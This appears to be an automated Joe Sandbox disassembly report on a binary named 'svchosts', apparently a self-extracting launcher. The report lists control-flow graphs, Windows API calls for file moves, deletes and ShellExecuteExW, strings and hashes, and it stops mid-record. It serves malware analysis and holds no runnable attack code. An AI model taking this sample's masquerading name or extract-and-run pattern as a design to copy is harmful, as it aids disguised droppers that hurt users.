                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                      • String ID: <,$ ?,$(>,$(@,$0A,$4=,$8<,$<?,$@>,$@@,$D=,$DA,$DXGIDebug.dll$P<,$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;,$T?,$X>,$X@,$\A,$`=,$dwmapi.dll$kernel32$l<,$p>,$p?,$p@,$uxtheme.dll$x=,$|<,$>,$?,
                                                                      • API String ID: 1201351596-931991055
                                                                      • Opcode ID: 47b2191eb45311c4777dee64c84d74417eae20ae0b024d013530b3b2bdef04ab
                                                                      • Instruction ID: 5b253f29a90baefc42b7d87780d065f9c8a748087269448d147a1bec2dfe90de
                                                                      • Opcode Fuzzy Hash: 47b2191eb45311c4777dee64c84d74417eae20ae0b024d013530b3b2bdef04ab
                                                                      • Instruction Fuzzy Hash: 02D161B15683849BD720EF50D849FDFBBE8BF85704F408E1DF58996140DBB086688F62

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 406 2abdf5-2abe0d call 2ae28c call 2ae360 411 2abe13-2abe3d call 2aaa36 406->411 412 2aca90-2aca9d 406->412 411->412 415 2abe43-2abe48 411->415 416 2abe49-2abe57 415->416 417 2abe58-2abe6d call 2aa6c7 416->417 420 2abe6f 417->420 421 2abe71-2abe86 call 2a17ac 420->421 424 2abe88-2abe8c 421->424 425 2abe93-2abe96 421->425 424->421 426 2abe8e 424->426 427 2aca5c-2aca87 call 2aaa36 425->427 428 2abe9c 425->428 426->427 427->416 443 2aca8d-2aca8f 427->443 429 2ac132-2ac134 428->429 430 2abea3-2abea6 428->430 431 2ac074-2ac076 428->431 432 2ac115-2ac117 428->432 429->427 434 2ac13a-2ac141 429->434 430->427 436 2abeac-2abf06 call 2a9da4 call 29b965 call 29a49d call 29a5d7 call 2970bf 430->436 431->427 435 2ac07c-2ac088 431->435 432->427 438 2ac11d-2ac12d SetWindowTextW 432->438 434->427 439 2ac147-2ac160 434->439 440 2ac08a-2ac09b call 2b7168 435->440 441 2ac09c-2ac0a1 435->441 497 2ac045-2ac05a call 29a52a 436->497 438->427 444 2ac168-2ac176 call 2b35b3 439->444 445 2ac162 439->445 440->441 448 2ac0ab-2ac0b6 call 2aab9a 441->448 449 2ac0a3-2ac0a9 441->449 443->412 444->427 461 2ac17c-2ac185 444->461 445->444 453 2ac0bb-2ac0bd 448->453 449->453 458 2ac0c8-2ac0e8 call 2b35b3 call 2b35de 453->458 459 2ac0bf-2ac0c6 call 2b35b3 453->459 480 2ac0ea-2ac0f1 458->480 481 2ac101-2ac103 458->481 459->458 465 2ac1ae-2ac1b1 461->465 466 2ac187-2ac18b 461->466 472 2ac296-2ac2a4 call 29fe56 465->472 473 2ac1b7-2ac1ba 465->473 466->465 470 2ac18d-2ac195 466->470 470->427 476 2ac19b-2ac1a9 call 29fe56 470->476 489 2ac2a6-2ac2ba call 2b17cb 472->489 478 2ac1bc-2ac1c1 473->478 479 2ac1c7-2ac1e2 473->479 476->489 478->472 478->479 492 2ac22c-2ac233 479->492 493 2ac1e4-2ac21e 479->493 486 2ac0f8-2ac100 call 2b7168 480->486 487 2ac0f3-2ac0f5 480->487 481->427 488 2ac109-2ac110 call 2b35ce 481->488 486->481 487->486 488->427 507 2ac2bc-2ac2c0 489->507 508 2ac2c7-2ac318 call 29fe56 call 2aa8d0 GetDlgItem SetWindowTextW SendMessageW call 2b35e9 489->508 499 2ac261-2ac284 call 2b35b3 * 2 492->499 500 2ac235-2ac24d call 2b35b3 492->500 528 2ac222-2ac224 493->528 529 2ac220 493->529 514 2abf0b-2abf1f SetFileAttributesW 497->514 515 2ac060-2ac06f call 29a4b3 497->515 499->489 534 2ac286-2ac294 call 29fe2e 499->534 500->499 522 2ac24f-2ac25c call 29fe2e 500->522 507->508 513 2ac2c2-2ac2c4 507->513 540 2ac31d-2ac321 508->540 513->508 516 2abfc5-2abfd5 GetFileAttributesW 514->516 517 2abf25-2abf58 call 29b4f7 call 29b207 call 2b35b3 514->517 515->427 516->497 526 2abfd7-2abfe6 DeleteFileW 516->526 549 2abf5a-2abf69 call 2b35b3 517->549 550 2abf6b-2abf79 call 29b925 517->550 522->499 526->497 533 2abfe8-2abfeb 526->533 528->492 529->528 537 2abfef-2ac01b call 29400a GetFileAttributesW 533->537 534->489 547 2abfed-2abfee 537->547 548 2ac01d-2ac033 MoveFileW 537->548 540->427 544 2ac327-2ac33b SendMessageW 540->544 544->427 547->537 548->497 551 2ac035-2ac03f MoveFileExW 548->551 549->550 556 2abf7f-2abfbe call 2b35b3 call 2af350 549->556 550->515 550->556 551->497 556->516
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 002ABDFA
                                                                        • Part of subcall function 002AAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 002AAAFE
                                                                      • SetWindowTextW.USER32(?,?), ref: 002AC127
                                                                      • _wcsrchr.LIBVCRUNTIME ref: 002AC2B1
                                                                      • GetDlgItem.USER32(?,00000066), ref: 002AC2EC
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 002AC2FC
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,002DA472), ref: 002AC30A
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002AC335
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                      • API String ID: 3564274579-312220925
                                                                      • Opcode ID: 23fb06ca6b4f0a3cd371a7e2b629731956545bb04801faf20109dff8a430ed8d
                                                                      • Instruction ID: ea8b10efd966c0162a2e35ed8fcc9fe5502b1015df408b6a96a5376a25bb6a92
                                                                      • Opcode Fuzzy Hash: 23fb06ca6b4f0a3cd371a7e2b629731956545bb04801faf20109dff8a430ed8d
                                                                      • Instruction Fuzzy Hash: DAE15F76D14219ABDF25DFA0DC49EEB77BCAF0A350F5040A6F909E2051EB709A94CF50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 561 29d341-29d378 call 2ae28c call 2ae360 call 2b15e8 568 29d3ab-29d3b4 call 29fe56 561->568 569 29d37a-29d3a9 GetModuleFileNameW call 29bc85 call 29fe2e 561->569 573 29d3b9-29d3dd call 299619 call 2999b0 568->573 569->573 580 29d7a0-29d7a6 call 299653 573->580 581 29d3e3-29d3eb 573->581 585 29d7ab-29d7bb 580->585 582 29d409-29d438 call 2b5a90 * 2 581->582 583 29d3ed-29d405 call 2a3781 * 2 581->583 595 29d43b-29d43e 582->595 594 29d407 583->594 594->582 596 29d56c-29d58f call 299d30 call 2b35d3 595->596 597 29d444-29d44a call 299e40 595->597 596->580 606 29d595-29d5b0 call 299bf0 596->606 601 29d44f-29d476 call 299bf0 597->601 607 29d47c-29d484 601->607 608 29d535-29d538 601->608 618 29d5b9-29d5cc call 2b35d3 606->618 619 29d5b2-29d5b7 606->619 610 29d4af-29d4ba 607->610 611 29d486-29d48e 607->611 612 29d53b-29d55d call 299d30 608->612 615 29d4bc-29d4c8 610->615 616 29d4e5-29d4ed 610->616 611->610 614 29d490-29d4aa call 2b5ec0 611->614 612->595 631 29d563-29d566 612->631 634 29d52b-29d533 614->634 635 29d4ac 614->635 615->616 621 29d4ca-29d4cf 615->621 623 29d519-29d51d 616->623 624 29d4ef-29d4f7 616->624 618->580 641 29d5d2-29d5ee call 2a137a call 2b35ce 618->641 627 29d5f1-29d5f8 619->627 621->616 630 29d4d1-29d4e3 call 2b5808 621->630 623->608 626 29d51f-29d522 623->626 624->623 625 29d4f9-29d513 call 2b5ec0 624->625 625->580 625->623 626->607 637 29d5fa 627->637 638 29d5fc-29d625 call 29fdfb call 2b35d3 627->638 630->616 645 29d527 630->645 631->580 631->596 634->612 635->610 637->638 650 29d633-29d649 638->650 651 29d627-29d62e call 2b35ce 638->651 641->627 645->634 654 29d64f-29d65d 650->654 655 29d731-29d757 call 29ce72 call 2b35ce * 2 650->655 651->580 657 29d664-29d669 654->657 690 29d759-29d76f call 2a3781 * 2 655->690 691 29d771-29d79d call 2b5a90 * 2 655->691 659 29d97c-29d984 657->659 660 29d66f-29d678 657->660 665 29d72b-29d72e 659->665 666 29d98a-29d98e 659->666 663 29d67a-29d67e 660->663 664 29d684-29d68b 660->664 663->659 663->664 668 29d691-29d6b6 664->668 669 29d880-29d891 call 29fcbf 664->669 665->655 670 29d9de-29d9e4 666->670 671 29d990-29d996 666->671 678 29d6b9-29d6de call 2b35b3 call 2b5808 668->678 692 29d897-29d8c0 call 29fe56 call 2b5885 669->692 693 29d976-29d979 669->693 676 29da0a-29da2a call 29ce72 670->676 677 29d9e6-29d9ec 670->677 672 29d99c-29d9a3 671->672 673 29d722-29d725 671->673 679 29d9ca 672->679 680 29d9a5-29d9a8 672->680 673->657 673->665 699 29da02-29da05 676->699 677->676 684 29d9ee-29d9f4 677->684 709 29d6e0-29d6ea 678->709 710 29d6f6 678->710 694 29d9cc-29d9d9 679->694 687 29d9aa-29d9ad 680->687 688 29d9c6-29d9c8 680->688 684->673 695 29d9fa-29da01 684->695 697 29d9af-29d9b2 687->697 698 29d9c2-29d9c4 687->698 688->694 690->691 691->580 692->693 721 29d8c6-29d93c call 2a1596 call 29fdfb call 29fdd4 call 29fdfb call 2b58d9 692->721 693->659 694->673 695->699 704 29d9be-29d9c0 697->704 705 29d9b4-29d9b8 697->705 698->694 704->694 705->684 711 29d9ba-29d9bc 705->711 709->710 715 29d6ec-29d6f4 709->715 716 29d6f9-29d6fd 710->716 711->694 715->716 716->678 720 29d6ff-29d706 716->720 722 29d70c-29d71a call 29fdfb 720->722 723 29d7be-29d7c1 720->723 754 29d94a-29d95f 721->754 755 29d93e-29d947 721->755 730 29d71f 722->730 723->669 725 29d7c7-29d7ce 723->725 728 29d7d0-29d7d4 725->728 729 29d7d6-29d7d7 725->729 728->729 733 29d7d9-29d7e7 728->733 729->725 730->673 735 29d7e9-29d7ec 733->735 736 29d808-29d830 call 2a1596 733->736 738 29d7ee-29d803 735->738 739 29d805 735->739 744 29d853-29d85b 736->744 745 29d832-29d84e call 2b35e9 736->745 738->735 738->739 739->736 746 29d85d 744->746 747 29d862-29d87b call 29dd6b 744->747 745->730 746->747 747->730 756 29d960-29d967 754->756 755->754 757 29d969-29d96d 756->757 758 29d973-29d974 756->758 757->730 757->758 758->756
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0029D346
                                                                      • _wcschr.LIBVCRUNTIME ref: 0029D367
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0029D328,?), ref: 0029D382
                                                                      • __fprintf_l.LIBCMT ref: 0029D873
                                                                        • Part of subcall function 002A137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0029B652,00000000,?,?,?,00010450), ref: 002A1396
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                      • String ID: $ ,$$%s:$$9,$*messages***$*messages***$@%s:$R$RTL$a
                                                                      • API String ID: 4184910265-2171448403
                                                                      • Opcode ID: 1d26697f23377302db8dd78727e9c93453563fb9124e802d3d065f81c8c55bd9
                                                                      • Instruction ID: 571ed2931ced273ec581819b5dc568d5a2aca17bb709daacf9b9cc82e83e3dec
                                                                      • Opcode Fuzzy Hash: 1d26697f23377302db8dd78727e9c93453563fb9124e802d3d065f81c8c55bd9
                                                                      • Instruction Fuzzy Hash: 7012B1B192021A9ADF24EFA4DC81BEEB7B9FF05300F50456EF505A7181EB709A60DF64

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 002AAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AAC85
                                                                        • Part of subcall function 002AAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AAC96
                                                                        • Part of subcall function 002AAC74: IsDialogMessageW.USER32(00010450,?), ref: 002AACAA
                                                                        • Part of subcall function 002AAC74: TranslateMessage.USER32(?), ref: 002AACB8
                                                                        • Part of subcall function 002AAC74: DispatchMessageW.USER32(?), ref: 002AACC2
                                                                      • GetDlgItem.USER32(00000068,002EECB0), ref: 002ACB6E
                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,002AA632,00000001,?,?,002AAECB,002C4F88,002EECB0), ref: 002ACB96
                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002ACBA1
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,002C35B4), ref: 002ACBAF
                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ACBC5
                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002ACBDF
                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ACC23
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002ACC31
                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ACC40
                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ACC67
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,002C431C), ref: 002ACC76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                      • String ID: \
                                                                      • API String ID: 3569833718-2967466578
                                                                      • Opcode ID: 6e9cdc37db7674ff448359aa093b8da507ec82485c39a4ae0f2b60d0c6c7fd64
                                                                      • Instruction ID: 402ca26f024e41614ce4c2ec1128012af476548af1ea233c37c50ed5dea28495
                                                                      • Opcode Fuzzy Hash: 6e9cdc37db7674ff448359aa093b8da507ec82485c39a4ae0f2b60d0c6c7fd64
                                                                      • Instruction Fuzzy Hash: 59319C72146342FBE301DF20BC4AFAB7FACEB92764F000519F65196191DB654908CB66

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 796 2ace22-2ace3a call 2ae360 799 2ad08b-2ad093 796->799 800 2ace40-2ace4c call 2b35b3 796->800 800->799 803 2ace52-2ace7a call 2af350 800->803 806 2ace7c 803->806 807 2ace84-2ace91 803->807 806->807 808 2ace93 807->808 809 2ace95-2ace9e 807->809 808->809 810 2acea0-2acea2 809->810 811 2aced6 809->811 812 2aceaa-2acead 810->812 813 2aceda-2acedd 811->813 814 2ad03c-2ad041 812->814 815 2aceb3-2acebb 812->815 816 2acedf-2acee2 813->816 817 2acee4-2acee6 813->817 820 2ad043 814->820 821 2ad036-2ad03a 814->821 818 2acec1-2acec7 815->818 819 2ad055-2ad05d 815->819 816->817 822 2acef9-2acf0e call 29b493 816->822 817->822 823 2acee8-2aceef 817->823 818->819 824 2acecd-2aced4 818->824 826 2ad05f-2ad061 819->826 827 2ad065-2ad06d 819->827 825 2ad048-2ad04c 820->825 821->814 821->825 831 2acf10-2acf1d call 2a17ac 822->831 832 2acf27-2acf32 call 29a180 822->832 823->822 828 2acef1 823->828 824->811 824->812 825->819 826->827 827->813 828->822 831->832 837 2acf1f 831->837 838 2acf4f-2acf5c ShellExecuteExW 832->838 839 2acf34-2acf4b call 29b239 832->839 837->832 841 2ad08a 838->841 842 2acf62-2acf6f 838->842 839->838 841->799 844 2acf82-2acf84 842->844 845 2acf71-2acf78 842->845 847 2acf9b-2acfba call 2ad2e6 844->847 848 2acf86-2acf8f 844->848 845->844 846 2acf7a-2acf80 845->846 846->844 849 2acff1-2acffd CloseHandle 846->849 847->849 866 2acfbc-2acfc4 847->866 848->847 854 2acf91-2acf99 ShowWindow 848->854 852 2ad00e-2ad01c 849->852 853 2acfff-2ad00c call 2a17ac 849->853 855 2ad079-2ad07b 852->855 856 2ad01e-2ad020 852->856 853->852 864 2ad072 853->864 854->847 855->841 859 2ad07d-2ad07f 855->859 856->855 861 2ad022-2ad028 856->861 859->841 863 2ad081-2ad084 ShowWindow 859->863 861->855 865 2ad02a-2ad034 861->865 863->841 864->855 865->855 866->849 867 2acfc6-2acfd7 GetExitCodeProcess 866->867 867->849 868 2acfd9-2acfe3 867->868 869 2acfea 868->869 870 2acfe5 868->870 869->849 870->869
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(?), ref: 002ACF54
                                                                      • ShowWindow.USER32(?,00000000), ref: 002ACF93
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 002ACFCF
                                                                      • CloseHandle.KERNEL32(?), ref: 002ACFF5
                                                                      • ShowWindow.USER32(?,00000001), ref: 002AD084
                                                                        • Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                      • String ID: $.exe$.inf
                                                                      • API String ID: 3686203788-2452507128
                                                                      • Opcode ID: 420439deb52e86b559cd0887892baf7d1af0ae63adaf2aed6566217254661ea9
                                                                      • Instruction ID: 111655944fa8ee1bbf698a678f0b060ef463586b0ec4cec0cbe9f1f10a1865d8
                                                                      • Opcode Fuzzy Hash: 420439deb52e86b559cd0887892baf7d1af0ae63adaf2aed6566217254661ea9
                                                                      • Instruction Fuzzy Hash: 396115704243829FDB319F24D904AABBBF5AF93340F14481EF4C697551DFB189A5CB92

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 871 2ba058-2ba071 872 2ba073-2ba083 call 2be6ed 871->872 873 2ba087-2ba08c 871->873 872->873 883 2ba085 872->883 875 2ba099-2ba0bd MultiByteToWideChar 873->875 876 2ba08e-2ba096 873->876 877 2ba0c3-2ba0cf 875->877 878 2ba250-2ba263 call 2aec4a 875->878 876->875 880 2ba123 877->880 881 2ba0d1-2ba0e2 877->881 887 2ba125-2ba127 880->887 884 2ba101-2ba112 call 2b8518 881->884 885 2ba0e4-2ba0f3 call 2c1a30 881->885 883->873 891 2ba245 884->891 899 2ba118 884->899 885->891 898 2ba0f9-2ba0ff 885->898 890 2ba12d-2ba140 MultiByteToWideChar 887->890 887->891 890->891 895 2ba146-2ba158 call 2ba72c 890->895 892 2ba247-2ba24e call 2ba2c0 891->892 892->878 900 2ba15d-2ba161 895->900 902 2ba11e-2ba121 898->902 899->902 900->891 903 2ba167-2ba16e 900->903 902->887 904 2ba1a8-2ba1b4 903->904 905 2ba170-2ba175 903->905 907 2ba200 904->907 908 2ba1b6-2ba1c7 904->908 905->892 906 2ba17b-2ba17d 905->906 906->891 909 2ba183-2ba19d call 2ba72c 906->909 910 2ba202-2ba204 907->910 911 2ba1c9-2ba1d8 call 2c1a30 908->911 912 2ba1e2-2ba1f3 call 2b8518 908->912 909->892 924 2ba1a3 909->924 915 2ba23e-2ba244 call 2ba2c0 910->915 916 2ba206-2ba21f call 2ba72c 910->916 911->915 927 2ba1da-2ba1e0 911->927 912->915 923 2ba1f5 912->923 915->891 916->915 929 2ba221-2ba228 916->929 928 2ba1fb-2ba1fe 923->928 924->891 927->928 928->910 930 2ba22a-2ba22b 929->930 931 2ba264-2ba26a 929->931 932 2ba22c-2ba23c WideCharToMultiByte 930->932 931->932 932->915 933 2ba26c-2ba273 call 2ba2c0 932->933 933->892
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002B4E35,002B4E35,?,?,?,002BA2A9,00000001,00000001,3FE85006), ref: 002BA0B2
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002BA2A9,00000001,00000001,3FE85006,?,?,?), ref: 002BA138
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002BA232
                                                                      • __freea.LIBCMT ref: 002BA23F
                                                                        • Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A
                                                                      • __freea.LIBCMT ref: 002BA248
                                                                      • __freea.LIBCMT ref: 002BA26D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: eac165d478c9d19f2f08c25a4cae3cb74f8153e6a0ab891afce3b2a977f0caf0
                                                                      • Instruction ID: 257a6a21208cfd79eaec0f52255d090304a2f9baf294ebd18752095c099c0d0f
                                                                      • Opcode Fuzzy Hash: eac165d478c9d19f2f08c25a4cae3cb74f8153e6a0ab891afce3b2a977f0caf0
                                                                      • Instruction Fuzzy Hash: AF51D172630206AFDB259E64CC46FFF77A9EB40790F194629FD08D6140EB75DC60CAA2

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 002A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
                                                                        • Part of subcall function 002A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2
                                                                      • OleInitialize.OLE32(00000000), ref: 002AA34E
                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002AA385
                                                                      • SHGetMalloc.SHELL32(002D8430), ref: 002AA38F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                      • String ID: riched20.dll$3To
                                                                      • API String ID: 3498096277-2168385784
                                                                      • Opcode ID: cfca47214ef321cbcb0fec7f1bf7ef434263f9ef00fe1657b5d9a17a9c9bd8eb
                                                                      • Instruction ID: 81b2d68d87ec060d44a35c706cf3db62d97ffb68d469b4669b5c4ef82ef01e2c
                                                                      • Opcode Fuzzy Hash: cfca47214ef321cbcb0fec7f1bf7ef434263f9ef00fe1657b5d9a17a9c9bd8eb
                                                                      • Instruction Fuzzy Hash: 3BF062B1C0020DABCB10AF99D8499EFFBFCEF96311F00416AE814E2200CBB40609CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 940 2999b0-2999d1 call 2ae360 943 2999dc 940->943 944 2999d3-2999d6 940->944 946 2999de-2999fb 943->946 944->943 945 2999d8-2999da 944->945 945->946 947 2999fd 946->947 948 299a03-299a0d 946->948 947->948 949 299a0f 948->949 950 299a12-299a31 call 2970bf 948->950 949->950 953 299a39-299a57 CreateFileW 950->953 954 299a33 950->954 955 299a59-299a7b GetLastError call 29b66c 953->955 956 299abb-299ac0 953->956 954->953 964 299aaa-299aaf 955->964 965 299a7d-299a9f CreateFileW GetLastError 955->965 957 299ae1-299af5 956->957 958 299ac2-299ac5 956->958 962 299b13-299b1e 957->962 963 299af7-299b0f call 29fe56 957->963 958->957 961 299ac7-299adb SetFileTime 958->961 961->957 963->962 964->956 969 299ab1 964->969 967 299aa1 965->967 968 299aa5-299aa8 965->968 967->968 968->956 968->964 969->956
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,002978AD,?,00000005,?,00000011), ref: 00299A4C
                                                                      • GetLastError.KERNEL32(?,?,002978AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00299A59
                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,002978AD,?,00000005,?), ref: 00299A8E
